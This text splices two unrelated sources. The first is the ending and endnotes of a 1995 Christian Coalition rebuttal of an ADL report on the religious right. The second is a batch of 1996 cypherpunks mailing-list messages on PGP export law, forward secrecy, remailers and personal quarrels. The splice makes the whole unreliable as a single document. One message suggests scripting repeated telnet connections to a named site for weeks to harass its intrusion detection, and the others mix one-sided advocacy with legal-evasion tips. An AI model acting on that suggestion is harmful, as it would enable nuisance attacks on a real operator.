<p>U.S. Surgeon General Joycelyn Elders gave a speech in New York City within weeks of the ADL report's release in which she referred to religious folk who are conservatives as "un-Christian." This was a clear assault on the deeply-held religious beliefs of millions of Americans. All 44 Republicans in the Senate condemned this act of arch-bigotry in a letter to President Bill Clinton, and 87 members of the House of Representatives called for Elders' resignation.<i> (67)</i>  What was the ADL's reaction to this act of defamation? Thunderous silence.
<p>The ADL, once a respected civil rights organization, has aided and abetted a campaign of intolerance against people of faith with whom they disagree politically. Instead of calling the Democrats to task for dividing Americans based on where they go to church or synagogue, the ADL has cast its own stones. 
<p>"It's an old thing in politics," said Representative Dick Armey of Texas, "Whenever you are trying to get people's attention, you create a monster out there. So, they are looking for a bogeymen, and they are hyping the story that the Republican Party is being taken over by a bunch of extremists." <i>(68)</i>
<p>"We are in a race between civilization and catastrophe," former Education Secretary Bill Bennett said of the campaign against religious conservatives. "We have record murder and violent crime rates, huge increases in births to unwed mothers, educational decline, broken families, and a president who has established a record of broken promises. All of this, and we are told that the very religious are what we must fear. Religion is on the side of civilization; more people ought to begin to realize it." <i>(69)</i>
<p><br><b>The Separation of Church and State</b>
<p>The ADL report is full of accusations that the Christian Coalition does not support the separation of church and state. Its sources include undated flyers passed out at conferences and quotations lifted out of context - as well as more unreliable pseudo-scholarship by Skipp Porteous. It also features attacks on David Barton, a Texas-based scholar who has argued that many of America's founders were sympathetic to Christian values. Most of Barton's work extensively documents writings of the nation's founders.
<p>The truth is that there is a lively debate about the role of religion in public life and the meaning of the First Amendment. The Christian Coalition supports the Establishment clause prohibiting a state- sponsored church. It does not support attempts to use the establishment clause to stifle the free speech rights of Christians, Jews, Muslims, native Americans, or anyone else. 
<p>That is why the Christian Coalition supported the Religious Freedom Restoration Act of 1993, which overturned the Supreme Court's 1990 decision in Employment Division v. Smith. In this decision the Court discarded the "compelling state interest standard" criteria for judging whether laws violated rights to free exercise of religion. The ADL strongly supported this legislation as well.
<p>In the same spirit, the Christian Coalition supports free speech rights for children in public schools. While we oppose mandatory prayers composed by school officials, we believe voluntary, student-initiated prayer is consistent with First Amendment rights to free speech. While disagreements over First Amendment issues abound, it is disingenuous to suggest that those who would allow religious speech in public schools are ipso facto opposed to church-state separation. The ADL quotes Pat Robertson as arguing that the "separation of church and state" is a "Soviet concept." This quotation is lifted out of context.  Robertson merely noted that the term "separation of church and state" does not appear in the U.S. Constitution, which is a statement of fact. The First Amendment specifically reads: "Congress shall make no law respecting an establishment of religion, or prohibiting the free exercise thereof."
<p>Robertson is a strong supporter of the First Amendment. For example, during his 1988 presidential campaign, Robertson stated: "I believe absolutely in the separation of church and state."<i> (70)</i>
<p>In 1991, he said on Larry King Live, "I think it [the separation of church and state] is far better. You look at Europe where they have established churches and they are really dying out. We have a much healthier church here in America, free from government money- .But I don't think the Constitution requires government to be opposed to religious faith."<i>(71)</i>
<p>Robertson's words echo those of William O. Douglas in Zorach v. Clauson (1952). "We are a religious people whose system of government presupposes a Supreme Being," argued Douglas. There was, he added, "no constitutional requirement which makes it necessary for government to be hostile to religion and to throw its weight against efforts to widen the effective scope of religious influence." <i>(72)</i>
<p>For most of America's history, church pulpits flamed with sermons about social injustices ranging from slavery and racism to poverty and the liquor trade. No one suggested that these activities posed a threat to the separation of church and state. Americans always have resisted the notion of a national religion, but embraced faith-based political movements as an essential counterbalance to social injustice and government encroachments on liberty.
<p>This is the view of the Christian Coalition. As Ralph Reed argues in his forthcoming book: "None of this adds up to the conclusion that America is a 'Christian nation' in the sense of a theocratic state or a unicultural society. That not only ignores the enormous contribution that Jews have made to America, but it is something of an anachronism. It makes just as much sense to say that Massachusetts is a Puritan colony or that Maryland is a Catholic state."<i> (73)</i>
<p>Reed adds, "What religious conservatives want is to accommodate the historic role of faith in American civic life. In short, they seek to restore the time-honored tradition of civil religion - not to establish Christianity by law or to create an official church."<i> (74)</i>
<p>"Our agenda, ultimately, of the Christian Coalition, isn't about theology," Reed said on ABC Nightline recently. "It is about public policy. We are trying to get public policy that is more family-friendly. And we think lower taxes, smaller government, and government that lives within its means is more family friendly."<i> (75)</i>
<p><br><b>Conclusion</b>
<p>The supreme tragedy of the ADL report is there is a resurgent anti-Semitism across the land emanating from sources as wide-ranging as the Ku Klux Klan, former Farrakhan lieutenant Kahlid Abdul Muhammad (who called New York city "Jew York City"), David Duke, and some opponents of the Israeli lobby. But an inaccurate, biased, and politically motivated report like the recent ADL offering undermines efforts to combat anti-Semitism. By crying wolf, the ADL endangers its credibility at a time of rising bigotry and a period of extraordinary delicacy in the Middle East peace process.
<p>In response to criticism of its report, the ADL has refused to back off, though it has engaged in some strategic public relations backpedaling.<i> (76)</i>  For its part, the Christian Coalition will continue to combat anti-Semitism and religious bigotry in all its ugly forms. It is willing to seek common ground with Jewish organizations on issues of mutual concern. The Christian Coalition never will waver from its steadfast defense of the Jewish people and the nation of Israel,  though it has been unfairly attacked by the ADL.
<p>"The Jewish community should recognize the depth of religious faith among Christian evangelicals and treat the Religious Right with tolerance and respect," urges Marshall Breger of the Heritage Foundation.<i> (77)</i>
<p> The ADL has displayed neither tolerance nor respect. Instead, it has engaged in a partisan campaign of innuendo, half-truths and outright falsehoods.
<p>Sadly, the ultimate losers are not the ADL's constituency, but all of us, for we desperately need a legitimate watchdog to combat bigotry. The Anti-Defamation League has committed defamation, not only against religious conservatives, but against its own stated purpose.
<p>We earnestly hope the ADL returns to its time-honored and vital role of ensuring that intolerance has no place in our civic discourse. For our part - despite the unfair and shoddily researched attack by the ADL - we will remain vigilant in seeing that anti-Semitism and bigotry does not rear its monstrous head in our society.
<p><br><b>END NOTES</b>
<p><i>1</i>. 	Mona Charen, "ADL Playing Upon Old Fears?"Washington Times, July 7, 1994, A17.
<p><i>2</i>.	Boschwitz Op-Ed submitted to the New York Times July 25, 1994.
<p><i>3</i>. 	Sam Skolnik, "ADL Takes Heat for Criticizing Christian Right,"Washington Jewish Week, June 30, 1994.
<p><i>4</i>. 	Don Feder, "ADL Attack Discredits Organization," Boston Herald, June 16, 1994.
<p><i>5</i>. 	Beth Gilinsky, letter to the editor, New York Post, July 13, 1994 (original in possession of author).
<p><i>6</i>. 	An "annotated" bibliography provides few specific references.  For sources on the Christian Coalition, for example, the ADL provides vague clues such as this: "The Los Angeles Times provided a comprehensive account of San Diego by Barry Horstman (March 22, 1992), and generally offers reliable West Coast coverage; the Norfolk Virginian-Pilot, The Freedom Writer, Group Research Report, People for the American Way's occasional reports and the group's monthly, Right- Wing Watch, were consulted frequently." Thus, the reader is supposed to take it on ADL' s word that its sources are reliable and that the quotations in the ADL report are accurate. Without specific listings of sources it is impossible to check many of its assertions.
<p><i>7</i>. 	Acknowledgments in the ADL report include, in addition to those already mentioned: Project Toscin, Coalition for Human Dignity, Group Research Report, Citizens Project, Mainstream Voters Project and Women' s Project. ADL, p. i.
<p><i>8</i>. 	Larry Kanter, "Gaining Journalistic Status Gives ADL a Legal Shot in the Arm," Northern California Jewish Bulletin, v. 142, No. 38, October 15, 1993, p. 3.
<p><i>9</i>. 	ADL, "Religious Right," p. 42.
<p><i>10</i>. 	Thomas L. Jipping, "The Anti-Defamation League's Campaign of Defamation," Free Congress Foundation, June 24, 1994, p. 13.
<p><i>11</i>. 	ADL, "The Religious Right," p. 27. 
<p><i>12</i>. 	Ibid.
<p><i>13</i>.	Transcript of NBC's Meet the Press, November 29, 1992, p. 4.
<p><i>14</i>. 	Sean Loughlin, "Christian Coalition's Soldier Marches On," Sarasota Herald-Tribune, February 22, 1994.
<p><i>15</i>. 	ADL, "Religious Right," p. 42. (The ADL consistently spells Wittmann' s name as "Wittman.")
<p><i>16</i>. 	ADL, "Religious Right," p. 91.
<p><i>17</i>. 	Thomas L. Jipping, "The Anti-Defamation League's Campaign of Defamation," June 24, 1994, Free Congress Foundation, p. 14.
<p><i>18</i>. 	David Cantor, "Anti-Defamation League Response to the Christian Coalition," July 13, 1994.
<p><i>19</i>. 	ADL, "Religious Right," pp. 2, 21, 22, 24, 42, 43, 97.
<p><i>20</i>. 	Transcript of speech for Christians' Israel Public Action Campaign, "Pat Robertson: Defender of Israel," January 30, 1994, p. 12.
<p><i>21</i>. 	Larry B. Stammer, "Religious Broadcasters Vow Fight On Doctrine Issue," Los Angeles Times, February 18, 1993.
<p><i>22</i>. 	John Wheeler, Jr., "Peace in the Holy Land," Christian American, February 1994, page 1, 4.
<p><i>23</i>. 	ADL, "Religious Right," p. 43.
<p><i>24</i>. 	John Wheeler, Jr., "Anti-Semitism in the Church," Christian American, July/August 1991, p. 12.
<p><i>25</i>. 	Ibid, p. 12.
<p><i>26</i>.	Rudy Boschwitz Op-Ed submitted to the New York Times July 25, 1994.
<p><i>27</i>. 	Sam Skolnik, "ADL Takes Heat for Criticizing Christian Right," Washington Jewish Week, June 20, 1994.
<p><i>28</i>. 	Don Feder, "ADL Attack Discredits Organization," Boston Herald, June 16, 1994.
<p><i>29</i>. 	Rod Drehrer, "Pro-Israel Group Decried ADL Attack: Christian Conservatives Are Friends," Washington Times, June 28, 1994, A12.
<p><i>30</i>. 	ADL, "Religious Right," p. 45.
<p><i>31</i>. 	Memo to Christian Coalition from Rhett Davis, July 5, 1994.
<p><i>32</i>. 	Ibid.
<p><i>33</i>. 	Don Feder, "ADL Attack Discredits Organization," Boston Herald, June 16, 1994.
<p><i>34</i>.	ADL, "Religious Right," p. 2.
<p><i>35</i>.	Transcript of CBN' s 700 Club, November 13, 1991.
<p><i>36</i>. 	Dennis King and Chip Berlet, "ADL Gate," Tikkun, July/August<br>
1993, p.36. The article describes how ADL leaders complained to the media about how they had been sidelined in their efforts to refute Duke's campaign because of their 501 (c) (3) status. Yet the ADL criticizes other organizations with the same tax status for not denouncing the Duke campaign.
<p><i>37</i>. 	ADL, "Religious Right," p. 20.
<p><i>38</i>. 	Ibid, p. 29.
<p><i>39</i>. 	Ibid, p. 28.
<p><i>40</i>. 	Thomas B. Edsall, "Christian Political Soldier Helps Revive Movement," Washington Post, September 10, 1993, A4.
<p><i>41</i>.	ADL, "Religious Right," p. 20.
<p><i>42</i>.	Jeff Baran, letter to Christian Coalition national office, July 25, 1994.
<p><i>43</i>. 	Carol Innerst, "Parents Labeled Religious Fanatics for Fighting Schools: Schools Learn Ways to Pin Labels on Parental Foes," Washington Times, April 13, 1994, A1.
<p><i>44</i>. 	Transcript of CNN' s Crossfire, December 18, 1992 [Transcript #727], p. 10.
<p><i>45</i>. 	KABC Radio, November 15, 1993.
<p><i>46</i>. 	Ralph E. Reed, working manuscript: The Dynamic Role of Religion in American Life (Dallas, TX: Word, Inc., 1994), p. 34.
<p><i>47</i>. 	Ralph E. Reed, "Casting a Wider Net," Policy Review, (Summer 1993), p. 31-33.
<p><i>48</i>. 	See, for example: "Christian Coalition NYC Voter Driver is Multi-Cultural Grassroots Effort," Christian Coalition press release, April 28, 1993. The New York Times carried in-depth stories about the Coalition's involvement in the May 4 elections on April 10, April 16 and April 17. Other New York media provided similarly detailed coverage.
<p><i>49</i>. 	Sam Dillon, "Spirited Race for Schools Accelerates," New York Times, April 28, 1993, B2.
<p><i>50</i>. 	ADL, "Religious Right," p. 32.
<p><i>51</i>. 	Letter from Ralph Reed to Rick Schenker, October 7, 1992.
<p><i>52</i>.	Christian Coalition Leadership Manual  (1994), p. 19.
<p><i>53</i>. 	ADL, "Religious Right," p. 36-37; 1990 FEC MURS 3167 and 3176, pp. 23, 24.
<p><i>54</i>. 	Reed, working manuscript, p. 223.
<p><i>55</i>. 	Christian Coalition Voter Guide, Texas Democratic Runoff Election, U.S. Congress, District 25.
<p><i>56</i>. 	Barbara Woerner, "African-American Christian Wins Office," Christian American (April 1994), p. 9.
<p><i>57</i>. 	Christian Coalition Congressional Scorecard, 1994 Edition.
<p><i>58</i>. 	Ibid.
<p><i>59</i>. 	Ibid.
<p><i>60</i>. 	Christian Coalition Leadership Manual, p. 1.3.
<p><i>61</i>. 	Ibid, p. 3.23.
<p><i>62</i>. 	Transcript of NBC's Meet the Press, November 29, 1992, p. 1.
<p><i>63</i>. 	ADL, "Religious Right," p. iii.
<p><i>64</i>. 	White House Press Office, "Remarks of President Clinton in 'Evening with the President' in Charlotte, North Carolina," April 28, 1994, U.S. Newswire.
<p><i>65</i>. 	Deborah Kalb, "Jewish Democrats Target Religious Right," Manhattan Jewish Sentinel, August 11-17, 1993, pp. 1, 11.
<p><i>66</i>.	Michael Barone, "In Virginia, Distorted Debate," Washington Post, October 28, 1993, p. A23.
<p><i>67</i>. 	Larry Marasak, "Elders Resignation Urged," Houston Chronicle, June 25, 1994.
<p><i>68</i>. 	Transcript of ABC's Nightline, June 23, 1994.
<p><i>69</i>. 	Statement by William J. Bennett, Press Conference on Religious Bigotry in Virginia Politics, October 25, 1993.
<p><i>70</i>. 	John Margolis, "Robertson Candidacy on Line in South Carolina," Chicago Tribune, March 5, 1988.
<p><i>71</i>. 	Transcript of CNN's Larry King Live, April 10, 1991.
<p><i>72</i>. 	Zorach v. Clauson, 343 U.S. 306 (1952).
<p><i>73</i>. 	Reed, working manuscript: p. 126.
<p><i>74</i>. 	Ibid.
<p><i>75</i>. 	Transcript of ABC's Nightline, June 23, 1994.
<p><i>76</i>. 	In a letter to the editor of the New York Post published on July 13, 1993, Foxman downplays the ADL report as mere "criticism" and says "a healthy democracy encourages and depends on the political involvement of conservative Christians."
<p><i>77</i>.	Marshall Breger, "Jewish Community Should Recognize Depth of Religious Faith," Moment, April 1994, p. 14.<br>
<hr>
<hr>
<center></center>
<center>Text Only Map</center>
<hr size=4><font size = "-2"><i>Copyright &#169 1995 by The
Christian Coalition of
this page and all contents.  All Rights Reserved.</i>
</body></html>








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Wed, 13 Mar 1996 15:43:21 +0800
To: cypherpunks@toad.com
Subject: Re: all.net
Message-ID: <199603130606.WAA08192@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain



This is the message that I got when I mistakenly typed
"telnet all.net"

[previously quoted message not repeated...]

P.S.  At this time, there is what appears to be a criminal conspiracy
underway to excersize our detection system.  Criminal because it is an
attempt to attack a Federal Interest Computer - conspiracy because some
of the participants have, after the fact, decided to participate in the
criminal activity by refusing to identify the source of the attack. 
This is a result of a posting to a mailing list by someone who was
apparently upset at having their activities detected.  A recent threat
to break into this site was posted, and we have contacted federal
authorities.  As this incident quantitatively increases, the level of
our work to check out each part of the incident (by administrators such
as yourself) may reach a total of $5,000.  At that point, the FBI will
be called in and participants in this activity may find that they are
under federal investigation. 

Please advise your users to cease and desist and advise them to advise
others to do so as well.  It would also help us to limit the damage and
establish culpability (and innocence) if you could get copies of the
posting sent to your users so we can track down the source of the threat
and determine what response, if any, is appropriate regarding your users
who may be innocent victims of (and accidental conduits for) this
attack.

        March 1996 - FC
-- Thaddeus Beier                     thad@hammerhead.com
   Technology Development                   408) 286-3376
   Hammerhead Productions        http://www.got.net/~thad 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Wed, 13 Mar 1996 15:53:45 +0800
To: "Dr. Dimitri Vulis" <dlv@bwalk.dm.com>
Subject: Re: How's that again?
In-Reply-To: <XTJPkD15w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.960312223414.15411B-100000@crl12.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Tue, 12 Mar 1996, Dr. Dimitri Vulis wrote:

> "Cypherpunk" is not a trademarked name. I've seen people say on this list
> (paraphrased)..."I'm hosting a cypherpunks meeting and X will not be 
> permitted to come because I don't like his political views". I like 
> reading this list, but if these views are compatible with being a 
> cypherpunk, then I'm not one. 
 
No one has ever made an announcement on the Cypherpunks list such
as the one you "paraphrased."  The meetings have always been open
to everyone.

If the good doctor is referring to my univiting of Jim Bell to
a private party held AFTER a Cypherpunk meeting he had better 
get his facts straight.  Jim Bell would have been welcome at the
Cypherpunks meeting.  He would not have been welcome at my party,
though, because of his intemperate bad manners, NOT his politics.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 13 Mar 1996 17:07:35 +0800
To: an534774@anon.penet.fi
Subject: Re: Crypto Exposure
Message-ID: <199603130737.XAA22803@ix15.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:05 AM 3/13/96 UTC, an534774@anon.penet.fi wrote:
>A few questions concerning the access to crypto
>software from foreigners living in the US: 
>
>- Suppose that an ISP (or a University) provides an account to
>a foreigner (i.e. the foreigner can access a few UNIX machines
>that are property of the ISP). Suppose now that PGP (for
>example) is installed on these machines, then the ISP expose
>the foreigner to crypto software, right? Is the ISP (or
>University) punishable by law?   

There isn't a good answer to this, but it's probably a bad idea
for any US-based school or ISP that permits foreigners to
access its files to provide crypto capability, unless it limits
it to Yankees (e.g. though Unix group permissions.)
It's certainly a bad idea for any _small_ organization,
or organization with a small legal budget, to do so.

>- Which version of PGP is the foreigner allowed to use in the
>US?  He would violate export restriction if he uses the US
>version and he would violate the RSA copyrights if he uses
>the internation version, right? 

No - this one there _is_ a good answer to :-)  US Law doesn't
restrict use of encryption by foreigners located within its borders
(except maybe special circumstances like agents of foreign
governments; I'll pass on answering that) - only on whether
US persons can give them munitions, and of course patents.
The clean approach is for the foreigner to bring a copy of the
US version of PGP into the US, either on magnetic media
or by downloading from ftp.ox.ac.uk or other free-world site.

>- What if the foreigner actually write crypto code while in
>the US?  Does he (or the Uni/ISP) violate export restrictions each 
>time he access the source code or execute his program if they are 
>stored on a public (Uni/ISP) machine? 

The foreigner isn't a US person, so he doesn't violate the
law by reading the code himself.  If the Uni or ISP knows
that it's providing encryption software to the foreigner,
it may be liable, but without scienter it's tough to have guilt.
Probably the foreigner should not keep encryption software on
University or ISP machines - floppy disks should do just fine :-)

Encryption material used only for authentication, of course,
is just fine, at least unless the foreigner is from a country
the US State Department considers to be an enemy, like Cuba.
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissable."  - US government statement on China...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 13 Mar 1996 17:05:39 +0800
To: cypherpunks@toad.com
Subject: Re: Remailer passphrases
Message-ID: <199603130737.XAA22807@ix15.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>Bill Frantz writes:
>> One of the reasons classical (government) crypto users change keys
>> frequently is to minimize the amount of data compromised by a broken key. 
>> We keep hearing about NSA decrypting 20 year old cyphertext and showing
>> more of the workings of the atomic spy rings operating in the 40s and 50s. 

The NSA's decryption of old cyphertext that's been publicized, other than
World War II cyphers such as Enigma and Purple, has primarily been
Russian "One Time Pads".  OTPs are perfectly secret - if they're made with
real random numbers and only used once, which the Russians were sloppy about.
Minimizing exposure is good.

perry@piermont.com replied
>Signed Diffie-Hellman key exchanges have the property known as
>"Perfect Forward Secrecy". Even if the opponent gets your public keys
>it still will not decrypt any traffic for him at all -- it just lets
>him pretend to be you. Thats one reason why protocols like Photuris
>and Oakley use the technique.

DH key exchange is really only Exponentially Good Forward Secrecy,
and in its primary use (exchanging keys for symmetric-key algorithms)
the system is at best Good Enough Forward Secrecy.  The difference
between exponentially good and perfect is exponentially small,
which is fine if your keys are long enough.  On the other hand,
cracking a symmetric-key algorithm is generally the weak link,
unless you're using 112-bit or better secret keys, and even 112s
might be crackable during the lifetime of the current universe.

How much information leaks if you reveal (say) 128 bits of a 
1024-bit Diffie-Hellman key?  Does it tell you anything at all
about any of the remaining 896 bits?  Is it safe to use 8 slices
of the 1024-bit key if 7 are revealed?   Does RSA have the same
problem?  This is partly an efficiency hack (cutting the number
of big slow calculations by 8) and partly a question of other
uses one might make of the bits, such as stealthing PGP headers.
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissable."  - US government statement on China...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 13 Mar 1996 14:52:11 +0800
To: Rich Graves <rich@c2.org>
Subject: Re: all.net
In-Reply-To: <199603130343.TAA27040@Networking.Stanford.EDU>
Message-ID: <Pine.SUN.3.91.960313001133.24845B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Mar 1996, Rich Graves wrote:

> At 04:55 PM 3/12/96 -0500, anonymous@extropia.wimsey.com wrote:
> >Has anyone else received one of these?
> >
> >> From: root@all.net (root)
> >> 
> >> A user at your site has just attempted to telnet into our site without
> >> proper authorization.  We consider this inappropriate behavior and would
> >> like an explanation of this action as soon as possible.
> >> This message is generated automatically at the time of the attempted
> >> entry and is sent to our administrators and the postmaster at the
> >> machine making the attempt.  We have included any information provided
> >> by your ident daemon (if in use) on the subject line of this message.
> >> We also do a reverse finger for future reference.
> >> 
> >> Fred Cohen - fc@all.net - tel:US+216-686-0090

I would LOVE to see someone write a script to telnet repeatedly to this 
site and run it from behind some nice firewall for several weeks.

But, that's just me talking.  Far be it from me to actually encourage 
such horidly irresponsible behavior.


---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 13 Mar 1996 16:26:41 +0800
To: "Dr. Dimitri Vulis" <dlv@bwalk.dm.com>
Subject: Re: How's that again?
In-Reply-To: <XTJPkD15w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.960313002636.24845C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Mar 1996, Dr. Dimitri Vulis wrote:

> jim bell <jimbell@pacifier.com> writes:
> > At 02:38 PM 3/12/96 -0800, Sandy Sandfort wrote:
> > >Hey, Jim, don't forget me.  You are the only person I have ever
> > >specifically UNinvited to one of my parties in over a decade of
> > >hosting same.  I guess that makes you special.
> >
> > You're confused.  You're describe YOUR reaction to ME, not MY reaction to
> > YOU.  And I am unaware of being invited to a "party," and now that I've
> > discovered what a sleazy person Alan Olsen and his merry band are, it is
> > really doubtful that I would have enjoyed what was advertised as a
> > cypherpunks meeting, but which you now claim was a "party."  Your level of
> > "honesty" is showing.
> 
> "Cypherpunk" is not a trademarked name. I've seen people say on this list
> (paraphrased) "I'm a cypherpunk, and I oppose unrestricted free speech
> because we must silence {homophobes}child pornographers|terrorists}" or
> "I'm hosting a cypherpunks meeting and X will not be permitted to come
> because I don't like his political views". I like reading this list,

You're a cypherpunk then.

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Wed, 13 Mar 1996 15:55:48 +0800
To: John Pettitt <jpp@software.net>
Subject: Re: PGP reveals  the key ID of the recipient of encrypted msg
Message-ID: <v02140b06ad6bb73beb5c@[165.254.158.237]>
MIME-Version: 1.0
Content-Type: text/plain


At 16:36 3/11/96, John Pettitt wrote:

>I can see a case where one would want to broadcast a message (say on usenet)
>with *no* indication of the intended recipient (not even a non registered
>key-id).  It would seem to be easy enough to hack up something that does not
>have key-IDs - to know if it's for you try decryption and if it works then
>it was for you.  This does not scale well as the recipient must trial
>decrypt all messages which could use *a lot* (tm) of CPU time.

There is also the problem of knowing WHICH key to use (ie: Even when you
know the message is intended for you, you must do a test run with each of
your keys until one works). Thus you want private keys whose ownership is
not publicly linked to your known identity (but is known to your
correspondents). So long as you have your corespondent's published Public
Key, you can use it to do a one-time transmission of a private Public Key
to be used to do anonymous (ie: Not Linked to your Public Identity)
transmissions to you.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@unix.asb.com>
Date: Wed, 13 Mar 1996 17:10:04 +0800
To: "Mark M." <markm@voicenet.com>
Subject: Re: frequency of remailer use?
In-Reply-To: <Pine.LNX.3.91.960309162300.1148A-100000@gak>
Message-ID: <31467016.662D@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


Mark M. wrote:
> 
> On Sat, 9 Mar 1996, Michael Froomkin wrote:
> 
> > I would be very grateful for pointers to data concerning the number of
> > messages that pass through remailers.  (Not anon.penet.fi -- real
> > remailers.) I am currently in a conversation with a journalist who should
> > know better, but claims that secure anonymous remailers are never used by
> > anyone -- just a curiosity.
> 
> For most remailers, you can get the usage statistics by sending a message
> to the remailer with the subject line "remailer-stats."

Problem is that chaining interferes with this.

A better way is to skin certain types of newsgroup headers over a period of 
time (a week or two) for messages sent from remailers.  It will also give
some stats as to what kinds of topics to people prefer anonymity.

It's also rather interesting to see how much remailer traffic is used for
posting rants/erotica/politically unpopular deas/heresies/criticism/
whistleblowing [I put these in the same category because they are related] 
and how many use them for the sake of just being anonymous [a regular 
participant who signs with an anonymous id/pgp-key but isn't necessarally 
posting something that requires anonyimity... hard to distinguish from first 
one though].

--Rob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 13 Mar 1996 18:51:25 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: How's that again?
Message-ID: <2.2.32.19960313102923.008ca650@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:43 PM 3/12/96 -0800, Sandy Sandfort wrote:

>On Tue, 12 Mar 1996, Dr. Dimitri Vulis wrote:
>
>> "Cypherpunk" is not a trademarked name. I've seen people say on this list
>> (paraphrased)..."I'm hosting a cypherpunks meeting and X will not be 
>> permitted to come because I don't like his political views". I like 
>> reading this list, but if these views are compatible with being a 
>> cypherpunk, then I'm not one. 
> 
>No one has ever made an announcement on the Cypherpunks list such
>as the one you "paraphrased."  The meetings have always been open
>to everyone.
>
>If the good doctor is referring to my univiting of Jim Bell to
>a private party held AFTER a Cypherpunk meeting he had better 
>get his facts straight.  Jim Bell would have been welcome at the
>Cypherpunks meeting.  He would not have been welcome at my party,
>though, because of his intemperate bad manners, NOT his politics.

Jim Bell is confused.  He was assuming that you were refering to the Feb
Cypherpunks meeting held in Portland.  The meeting was held in a private
residence and Jim was asked not to attend because the owner of the apartment
did not want to deal with Mr. Bell's poor behaviour.  It had nothing to do
with his political beliefs.  It had everything to do with how he handles
himself when his views are challenged.

But then, everything that happens in Portland that is not to Jim's
satisfaction is somehow my fault...
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 13 Mar 1996 18:52:53 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: How's that again?
Message-ID: <2.2.32.19960313102924.008b1330@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:52 PM 3/12/96 -0800, Sandy Sandfort wrote:

>Jim and interested C'punks,
>
>In response to a Jim Bell post I wrote:
>
>> >Hey, Jim, don't forget me.  You are the only person I have ever
>> >specifically UNinvited to one of my parties in over a decade of
>> >hosting same.  I guess that makes you special.
>
>To which Jim replied:
> 
>> You're confused.  You're describe YOUR reaction to ME, not MY reaction to 
>> YOU.  And I am unaware of being invited to a "party," and now that I've 
>> discovered what a sleazy person Alan Olsen and his merry band are, it is 
>> really doubtful that I would have enjoyed what was advertised as a 
>> cypherpunks meeting, but which you now claim was a "party."  Your level of 
>> "honesty" is showing.
>
>A)  It is you who is confused (see below)
>
>B)  I'm not Alan Olsen (nor a member of his merry band, so I have
>    no idea what you are talking about.

Wrong area of the country.  My branch of the Illuminati only controls the
area around portland.

>C)  There was a Cypherpunk meeting followed by a party.  The
>    pictures are on the Web.

A party which I missed.  (It looked like ALOT of fun!)

>D)  It is your level of honesty that is showing.  As can be seen
>    from the two messages (below) I sent you at the time.  They
>    quote you in pertinent part.

[quoted text removed for space]

I found out along time ago that Jim only sees what Jim *WANTS* to see. 

This whole tantrum of his is because I challenged his views on the list and
happened to mention a "cunning plan" on his.  Jim demanded an apology for
treating him differently than what he wanted to be treated.  (He felt that I
owed him some sort of "respect", something I lost for him when I met him in
person.)  He never once wanted to deal with it in a civil manner.  Instead
he wanted to vent in public and get some sort of emotional satisfaction.
(Something I would guess he does not recieve in real life.)  Since that
time, he has taken every opertunity to slander me on this list.  (And, for
the most part, I ignore him.)  

I have found that the best way to counter any idea that Jim has is to just
let him go on about it.  His lack of tact, his refusal to deal with any
